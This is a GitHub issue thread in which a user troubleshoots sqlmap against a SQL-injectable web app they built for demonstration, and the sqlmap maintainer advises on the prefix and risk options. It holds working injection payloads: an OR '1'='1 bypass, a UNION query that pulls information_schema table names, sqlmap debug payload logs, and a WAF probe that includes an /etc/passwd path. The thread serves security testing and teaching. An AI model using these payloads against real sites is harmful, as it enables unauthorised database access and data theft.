### ISSUE TITLE
sqlmap not picking up simple sql injection

### ISSUE THREAD

**Issue by amlwwalker** [sqlmapproject/sqlmap#1477]
I have built a vulnerable web application to demonstrate sql injection. I want to show both manual injection and automated injection. The injection requires a) the user to be logged in (session cookie), b) a user SSL certificate and c) a PREFIX.
My command is:

```
python ./sqlmap.py --auth-file ~/welcomecert.p12 -u "http://vulnsite.com/index.php?profile=adminsnowball" -p profile --cookie="PHPSESSID=sp1222aplv64fok7pa7voe447" --prefix="adminsnowball'" -v 3 --dbms mysql --level 5 --risk 3 --union-cols 10-16
```
I can see that sqlmap is working away but it never finds the field to be injectable.

A manual injection like this works:

    http://vulnapp.com/index.php?profile=admin' or '1'='1

Things that might be causing sqlmap to fail:

1. The returned error message is a custom error message, not a MySQL error message.
2. The profile prefix must be the logged in username.
3. The `UNION` isn't testing enough fields possibly
4. Its not testing strings but just integers (for instance `AND 3347=7762` and not `AND '3347'='7762`
5. Its testing `AND` and not `OR` (I can't see any `OR`s being tested)
6. The http `GET` request is then passed to JS which ajax's for the data from the server. Perhaps the response is lost to sqlmap?

Below is some of the queries that can see it is testing, but apparently they all fail

    [PAYLOAD] admin' AND 3115=1602 AND (3320=3320
    [PAYLOAD] admin' AND 5213=5213 AND (8263=8263
    [PAYLOAD] admin' AND 3347=7762
    [PAYLOAD] admin' AND 5213=5213
    [PAYLOAD] admin' ORDER BY 1--
    [PAYLOAD] admin' ORDER BY 3421--
    [PAYLOAD] admin' UNION ALL SELECT NULL--
    [PAYLOAD] admin' UNION ALL SELECT NULL,NULL--
    [PAYLOAD] admin' UNION ALL SELECT NULL,NULL,NULL--
    [PAYLOAD] admin' UNION ALL SELECT NULL,NULL,NULL,NULL--

EDIT: This query also works manually:

    ' union select table_name,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where 'x'='x

but sqlmap doesnt seem to test unions like that

EDIT I read this article http://www.binarytides.com/using-sqlmap-with-login-forms/ that suggested adding the '1' = '1 as part of the prefix but to no avail. Any suggestions? Ive also whacked the level up to 5 and the risk to 3

**Comment by stamparm** [comment]
You are doing several cardinal mistakes. Now on mobile, so making a quick
reply.

1) you are using prefix admin' which is appended to the original value
admin (e.g. adminadmin'). --prefix is a payload prefix and not the whole
parameter value prefix
2) to turn on the OR injections you should use high risk (e.g. --risk=3)
3) i am not sure whether usage of your cookie and user certificate are a
valid logic. I mean, shouldn't the certificate itself provide you with some
kind of authentication that is not coherent with your provided cookie. I am
just saying that this looks strange
4) use --union-cols then. You say that you know the number of columns, but
you are a skipping this option

**Comment by amlwwalker** [comment]
Hi

Thanks for reply,

1.  right...: 
Thats interesting re the prefix thing. So if I am going to
```
http://komodobank.com/index.php?profile=admin
```
then my prefix should be `--prefix="' or '1'='1"` ?? as a admin will already be there?

2. so I am using `--level 5 --risk 3` on the end of my request and the ORs are going through, 

3. The reason i pass a certificate and a cookie, is because I have protected the entire site with client side ssl certificates, so that only devices with the cert can access the url, and then there is also a login which is required before you get to the page that the vulnerability exists on.

4. I am using `--union-cols` its the last argument in my request...`

**Comment by stamparm** [comment]
Your prefix should be --prefix="'".

But, sqlmap should be working fine without your usage of it. Its a common
prefix

**Comment by amlwwalker** [comment]
Ok so Im running it again now without a prefix, very early on it thinks its not vulnerable:

```
python ./sqlmap.py --auth-file ~/welcomecert.p12 -u "http://vulnsite.com/_php/get.php?profile=admin" -p profile --cookie="PHPSESSID=isp1222aplv64fok7pa7voe4cc" -v 3 --dbms mysql --level 5 --risk 3 --union-cols 10-16
         _
 ___ ___| |_____ ___ ___  {1.0-dev-3dc8820}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:35:46

[17:35:46] [DEBUG] cleaning up configuration parameters
[17:35:46] [DEBUG] checking for WebSocket
[17:35:46] [DEBUG] setting the HTTP Referer header to the target URL
[17:35:46] [DEBUG] setting the HTTP Host header to the target URL
[17:35:46] [DEBUG] setting the HTTP timeout
[17:35:46] [DEBUG] setting the HTTP Cookie header
[17:35:46] [DEBUG] setting the HTTP(s) authentication PEM private key
[17:35:46] [DEBUG] creating HTTP requests opener object
[17:35:46] [DEBUG] forcing back-end DBMS to user defined value
[17:35:46] [DEBUG] setting the HTTP Referer header to the target URL
[17:35:46] [DEBUG] setting the HTTP Host header to the target URL
[17:35:46] [DEBUG] provided parameter 'profile' is not inside the Cookie
[17:35:46] [DEBUG] resolving hostname 'komodobank.com'
[17:35:46] [INFO] testing connection to the target URL
[17:35:46] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 301 redirect to 'https://komodobank.com/_php/get.php'. Do you want to follow? [Y/n] Y
[17:35:49] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:35:49] [PAYLOAD] AAIr=6584 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
[17:35:49] [INFO] testing if the target URL is stable
[17:35:49] [PAYLOAD] adminsnowball("""(,,()'
[17:35:49] [WARNING] heuristic (basic) test shows that GET parameter 'profile' might not be injectable
[17:35:49] [PAYLOAD] adminsnowball'VxmC<'">MODQ
[17:35:50] [INFO] testing for SQL injection on GET parameter 'profile'
[17:35:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:35:50] [PAYLOAD] adminsnowball) AND 3373=5170
[17:35:50] [PAYLOAD] adminsnowball) AND 3262=3262
[17:35:50] [PAYLOAD] adminsnowball') AND 4690=7602
[17:35:50] [PAYLOAD] adminsnowball') AND 3262=3262
[17:35:51] [PAYLOAD] adminsnowball' AND 1964=8521
[17:35:52] [PAYLOAD] adminsnowball' AND 3262=3262
[17:35:52] [PAYLOAD] adminsnowball" AND 5589=8960
etc etc etc...
```

A valid response looks like:

```
[
    {
        "balance": "65000.000", 
        "firstName": "Mike", 
        "id": 1, 
        "lastName": "Snow", 
        "transTS": 0, 
        "username": "admin"
    }
]
```
An invalid response looks like

```
[]
```
and a response to a `' or '1'='1` injection returns all the entries in the daabase in the json format, rather than jsut the current users.

**Comment by stamparm** [comment]
`Ok so Im running it again now without a prefix, very early on it thinks its not vulnerable:` <- this is so wrong. You are concluding this on a heuristic test. I am closing this down

**Comment by amlwwalker** [comment]
Thanks stamparm, this has been fixed and seems to now be working. I haven't seen what the issue was but I can see sqlmap is now finding it as injectable
